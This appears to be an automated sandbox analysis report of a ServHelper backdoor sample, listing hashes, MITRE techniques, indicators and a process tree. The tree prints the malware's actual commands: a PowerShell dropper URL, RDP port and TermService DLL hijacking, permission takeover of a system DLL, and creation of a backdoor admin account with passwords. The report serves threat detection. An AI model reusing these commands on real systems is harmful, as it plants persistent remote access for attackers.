servhelper | 046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 09:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe
Size

5.9MB
MD5

f71c575754e1f5890ad8b35afd08b8be
SHA1

69803b96f3820fabd81c79d422a1fa2a72ccb699
SHA256

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
SHA512

32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301
SSDEEP

49152:1Hjgzprb/TkvO90dL3BmAFd4A64nsfJ9X559RIO3CV7rfM2Zy4oaBqn4BHXVpetO:1H6/X5mAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

flow	pid	Process
16	2384	powershell.exe
20	2384	powershell.exe
24	2384	powershell.exe
26	2384	powershell.exe
28	2384	powershell.exe
32	2384	powershell.exe
35	2384	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
112	icacls.exe
3244	icacls.exe
624	takeown.exe
2088	icacls.exe
848	icacls.exe
4448	icacls.exe
4428	icacls.exe
1724	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
3560	Process not Found
3560	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4428	icacls.exe
624	takeown.exe
1724	icacls.exe
112	icacls.exe
3244	icacls.exe
2088	icacls.exe
848	icacls.exe
4448	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a00000002321a-101.dat	upx
behavioral2/files/0x000f00000002313c-100.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7EF7.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lzb14dnu.ie5.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7EE5.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F07.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7EE6.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7EC5.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jxy3mkjj.psx.ps1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4372	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5080	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3456	powershell.exe
3456	powershell.exe
2256	powershell.exe
2256	powershell.exe
2664	powershell.exe
2664	powershell.exe
8	powershell.exe
8	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
2384	powershell.exe
2384	powershell.exe
2384	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	3136	046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeRestorePrivilege	112	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4372	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4372	WMIC.exe
Token: SeAuditPrivilege	4372	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4372	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4372	WMIC.exe
Token: SeAuditPrivilege	4372	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4592	WMIC.exe
Token: SeAuditPrivilege	4592	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4592	WMIC.exe
Token: SeAuditPrivilege	4592	WMIC.exe
Token: SeDebugPrivilege	2384	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3136 wrote to memory of 3456	3136	046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe	90
PID 3136 wrote to memory of 3456	3136	046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe	90
PID 3456 wrote to memory of 1896	3456	powershell.exe	92
PID 3456 wrote to memory of 1896	3456	powershell.exe	92
PID 1896 wrote to memory of 5004	1896	csc.exe	93
PID 1896 wrote to memory of 5004	1896	csc.exe	93
PID 3456 wrote to memory of 2256	3456	powershell.exe	96
PID 3456 wrote to memory of 2256	3456	powershell.exe	96
PID 3456 wrote to memory of 2664	3456	powershell.exe	145
PID 3456 wrote to memory of 2664	3456	powershell.exe	145
PID 3456 wrote to memory of 8	3456	powershell.exe	101
PID 3456 wrote to memory of 8	3456	powershell.exe	101
PID 3456 wrote to memory of 624	3456	powershell.exe	153
PID 3456 wrote to memory of 624	3456	powershell.exe	153
PID 3456 wrote to memory of 4428	3456	powershell.exe	105
PID 3456 wrote to memory of 4428	3456	powershell.exe	105
PID 3456 wrote to memory of 112	3456	powershell.exe	154
PID 3456 wrote to memory of 112	3456	powershell.exe	154
PID 3456 wrote to memory of 1724	3456	powershell.exe	107
PID 3456 wrote to memory of 1724	3456	powershell.exe	107
PID 3456 wrote to memory of 4448	3456	powershell.exe	108
PID 3456 wrote to memory of 4448	3456	powershell.exe	108
PID 3456 wrote to memory of 3244	3456	powershell.exe	109
PID 3456 wrote to memory of 3244	3456	powershell.exe	109
PID 3456 wrote to memory of 848	3456	powershell.exe	110
PID 3456 wrote to memory of 848	3456	powershell.exe	110
PID 3456 wrote to memory of 2088	3456	powershell.exe	111
PID 3456 wrote to memory of 2088	3456	powershell.exe	111
PID 3456 wrote to memory of 4184	3456	powershell.exe	112
PID 3456 wrote to memory of 4184	3456	powershell.exe	112
PID 3456 wrote to memory of 5080	3456	powershell.exe	113
PID 3456 wrote to memory of 5080	3456	powershell.exe	113
PID 3456 wrote to memory of 2360	3456	powershell.exe	114
PID 3456 wrote to memory of 2360	3456	powershell.exe	114
PID 3456 wrote to memory of 3736	3456	powershell.exe	115
PID 3456 wrote to memory of 3736	3456	powershell.exe	115
PID 3736 wrote to memory of 4724	3736	net.exe	116
PID 3736 wrote to memory of 4724	3736	net.exe	116
PID 3456 wrote to memory of 2152	3456	powershell.exe	117
PID 3456 wrote to memory of 2152	3456	powershell.exe	117
PID 2152 wrote to memory of 2296	2152	cmd.exe	118
PID 2152 wrote to memory of 2296	2152	cmd.exe	118
PID 2296 wrote to memory of 840	2296	cmd.exe	119
PID 2296 wrote to memory of 840	2296	cmd.exe	119
PID 840 wrote to memory of 3188	840	net.exe	120
PID 840 wrote to memory of 3188	840	net.exe	120
PID 3456 wrote to memory of 4812	3456	powershell.exe	121
PID 3456 wrote to memory of 4812	3456	powershell.exe	121
PID 4812 wrote to memory of 3024	4812	cmd.exe	122
PID 4812 wrote to memory of 3024	4812	cmd.exe	122
PID 3024 wrote to memory of 3772	3024	cmd.exe	123
PID 3024 wrote to memory of 3772	3024	cmd.exe	123
PID 3772 wrote to memory of 1496	3772	net.exe	124
PID 3772 wrote to memory of 1496	3772	net.exe	124
PID 3652 wrote to memory of 3376	3652	cmd.exe	128
PID 3652 wrote to memory of 3376	3652	cmd.exe	128
PID 3376 wrote to memory of 4516	3376	net.exe	129
PID 3376 wrote to memory of 4516	3376	net.exe	129
PID 4036 wrote to memory of 1792	4036	cmd.exe	132
PID 4036 wrote to memory of 1792	4036	cmd.exe	132
PID 1792 wrote to memory of 2888	1792	net.exe	133
PID 1792 wrote to memory of 2888	1792	net.exe	133
PID 5060 wrote to memory of 1760	5060	cmd.exe	136
PID 5060 wrote to memory of 1760	5060	cmd.exe	136

C:\Users\Admin\AppData\Local\Temp\046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe
"C:\Users\Admin\AppData\Local\Temp\046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3456
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\guvcm1e4\guvcm1e4.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1896
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D33.tmp" "c:\Users\Admin\AppData\Local\Temp\guvcm1e4\CSC4142DEAC6D2F4A09B71EAC68D3D72F3B.TMP"
      4⤵
      PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:8
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:624
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4428
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1724
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4448
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3244
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:848
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2088
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4184
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:5080
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2360
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:4724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2296
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:840
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3188
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3024
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3772
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1496
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4152

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3652
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:4516

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc xaxH4MXO /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4036
- C:\Windows\system32\net.exe
  net.exe user wgautilacc xaxH4MXO /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc xaxH4MXO /add
    3⤵
    PID:2888

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  PID:1760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:2376

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FHOHZANM$ /ADD
1⤵
PID:4348
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FHOHZANM$ /ADD
  2⤵
  PID:3884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FHOHZANM$ /ADD
    3⤵
    PID:1464

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:1872
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:4928
- - C:\Windows\system32\net1.exe
